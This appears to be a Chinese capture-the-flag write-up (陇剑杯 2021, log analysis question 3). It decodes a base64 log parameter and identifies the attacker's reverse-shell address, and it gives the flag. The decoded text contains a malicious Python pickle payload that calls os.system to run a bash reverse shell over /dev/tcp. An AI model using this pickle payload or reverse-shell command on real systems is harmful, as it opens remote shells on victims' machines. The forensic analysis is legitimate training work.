[陇剑杯 2021]简单日志分析(问3)

1. 提取最后一条 base64

最后一条日志的 user 参数值为:

text

复制代码
STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4=

2. Base64 解码

python

复制代码
import base64

payload = "STAKcDAKMFMnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4="
decoded = base64.b64decode(payload)
print(decoded)

输出:

text

复制代码
b'I\x0c0\x0c0S\'bash -i >& /dev/tcp/192.168.2.197/8888 0>&1\'\nw1\n0(g0\nlp2\n0(I0\ntp3\n0(g3\nI0\ndp4\n0cos\nsystem\np5\n0g5\n(g1\ntR.'

可以看到里面明明白白地出现了:

text

复制代码
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1

3. 结论

反弹 shell 的目标 IP 和端口是:

text

复制代码
192.168.2.197:8888

最终答案:

text

复制代码
192.168.2.197:8888
NSSCTF{192.168.2.197:8888}
相关推荐
打小就很皮...2 分钟前
基于 Dify 实现 AI 流式对话:组件设计思路(React)
前端·react.js·dify·流式对话
探索宇宙真理.3 分钟前
OpenWebui 富文本提示词 远程命令注入漏洞 | CVE-2025-64495 复现&研究
经验分享·安全漏洞
这个昵称也不能用吗?10 分钟前
【安卓 - 小组件 - app进程与桌面进程】
前端
kuilaurence14 分钟前
CSS `border-image` 给文字加可拉伸边框
前端·css
一 乐17 分钟前
校园墙|校园社区|基于Java+vue的校园墙小程序系统(源码+数据库+文档)
java·前端·数据库·vue.js·spring boot·后端·小程序
这儿有一堆花20 分钟前
部署Cloudflare免费图床——免费开源强大
开源·github
一只小阿乐22 分钟前
前端react 开发 图书列表分页
前端·react.js·react·ant-
IT古董27 分钟前
在 React 项目中使用 Ky 与 TanStack Query 构建现代化数据请求层
前端·react.js·前端框架
夏日不想说话36 分钟前
一文搞懂 AI 流式响应
前端·node.js·openai
ddacrp1 小时前
RHEL_配置dns主从服务
github